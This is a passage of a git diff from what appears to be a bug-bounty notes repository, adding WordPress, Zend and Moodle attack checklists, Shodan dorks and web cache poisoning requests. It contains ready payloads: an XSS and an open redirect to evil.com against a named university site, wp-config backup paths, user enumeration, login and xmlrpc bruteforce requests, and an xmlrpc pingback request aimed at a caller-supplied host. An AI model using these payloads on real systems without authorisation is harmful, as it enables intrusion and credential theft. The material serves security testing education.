etc. - [x] Heartbleed Scanning - [x] General Security Misconfiguration Scanning + * ### __Large Scope__ Everything related to the Organization is a part of Scope. This includes child companies, subdomains or any labelled asset owned by organization. - [x] Tracking & Tracing every possible signatures of the Target Application (Often there might not be any history on Google related to a scope target, but you can still crawl it.) ​ diff --git a/Recon/Shodan Dorks.md b/Recon/Shodan Dorks.md index 5b14648..07e69fd 100644 --- a/Recon/Shodan Dorks.md +++ b/Recon/Shodan Dorks.md @@ -549,7 +549,7 @@ http.title:"- Polycom" "Server: lighttpd" ### Intel Active Management CVE-2017-5689 ``` "Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 -”Active Management Technology” +"Active Management Technology" ``` ### HP iLO 4 CVE-2017-12542 diff --git a/Framework/laravel.md b/Technologies/Laravel.md similarity index 100% rename from Framework/laravel.md rename to Technologies/Laravel.md diff --git a/Technologies/Moodle.md b/Technologies/Moodle.md index bb4a6d1..bcd6c50 100644 --- a/Technologies/Moodle.md +++ b/Technologies/Moodle.md @@ -1,11 +1,11 @@ # Moodle -1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter +1. Reflected XSS in /mod/lti/auth.php via "redirect_url" parameter ``` https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1) ``` -2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter +2. Open redirect in /mod/lti/auth.php in "redirect_url" parameter ``` https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com diff --git a/Technologies/WordPress.md b/Technologies/WordPress.md new file mode 100644 index 0000000..84069bb --- /dev/null +++ b/Technologies/WordPress.md @@ -0,0 +1,101 @@ +# WordPress Common Bugs + +## Introduction +What would you do if you came across a website that uses WordPress? + +1. Find the related CVE by checking the core, plugins, and theme version +* How to find the wordpress version +``` +https://target.com/feed +https://target.com/?feed=rss2 +``` + +* How to find the plugin version +``` +https://target.com/wp-content/plugins/PLUGINNAME/readme.txt +https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT +https://target.com/wp-content/plugins/PLUGINNAME/README.txt +https://target.com/wp-content/plugins/PLUGINNAME/README.TXT +``` + +> or change readme.txt to changelog.txt or readme.md + +* How to find the theme version +``` +https://target.com/wp-content/themes/THEMENAME/style.css +https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file) +``` +If you found outdated core / plugins / themes, find the exploit at https://wpscan.com + +2. Finding log files +``` +http://target.com/wp-content/debug.log +``` + +3. Finding backup file wp-config +``` +http://target.com/.wp-config.php.swp +http://target.com/wp-config.inc +http://target.com/wp-config.old +http://target.com/wp-config.txt +http://target.com/wp-config.html +http://target.com/wp-config.php.bak +http://target.com/wp-config.php.dist +http://target.com/wp-config.php.inc +http://target.com/wp-config.php.old +http://target.com/wp-config.php.save +http://target.com/wp-config.php.swp +http://target.com/wp-config.php.txt +http://target.com/wp-config.php.zip +http://target.com/wp-config.php.html +http://target.com/wp-config.php~ +``` + +4. Get the username on the website +``` +http://target.com/?author=1 +``` +or +``` +http://target.com/wp-json/wp/v2/users +http://target.com/?rest_route=/wp/v2/users +``` + +5. Bruteforce +``` +POST /wp-login.php HTTP/1.1 +Host: target.com + +log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1 +``` +or +``` +POST /xmlrpc.php HTTP/1.1 +Host: target.com + + + +wp.getUsersBlogs + +admin +BRUTEFORCE_IN_HERE + + +``` + +6. XSPA in wordpress +``` +POST /xmlrpc.php HTTP/1.1 +Host: target.com + + +pingback.ping + +http://yourip:port + + +https://target.com> + + + +``` diff --git a/Technologies/Zend.md b/Technologies/Zend.md new file mode 100644 index 0000000..f0d0b5a --- /dev/null +++ b/Technologies/Zend.md @@ -0,0 +1,13 @@ +# Common bug in Zend framework + +## Introduction +What would you do if you came across a website that uses Zend? + +## How to Detect + + +1. Finding config files +``` +https://target.com/application/configs/application.ini +https://target.com/admin/configs/application.ini +``` \ No newline at end of file diff --git a/Web Cache Poisoning.md b/Web Cache Poisoning.md index 1ba7a47..da1ba97 100644 --- a/Web Cache Poisoning.md +++ b/Web Cache Poisoning.md @@ -1,8 +1,9 @@ # Web Cache Poisoning -## **Introduction** + +## Introduction The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. -## **How to Find** +## How to FInd 1. Basic poisoning ``` GET / HTTP/1.1 @@ -29,6 +30,7 @@ Cache-Control: public, no-cache … a.png" /> ``` + 2. Seizing the Cache ``` GET / HTTP/1.1 @@ -45,6 +47,7 @@ Cache-Control: public, max-age=1800 ``` + 3. Selective poisoning ``` GET / HTTP/1.1 @@ -60,6 +63,7 @@ Vary: User-Agent, Accept-Encoding … a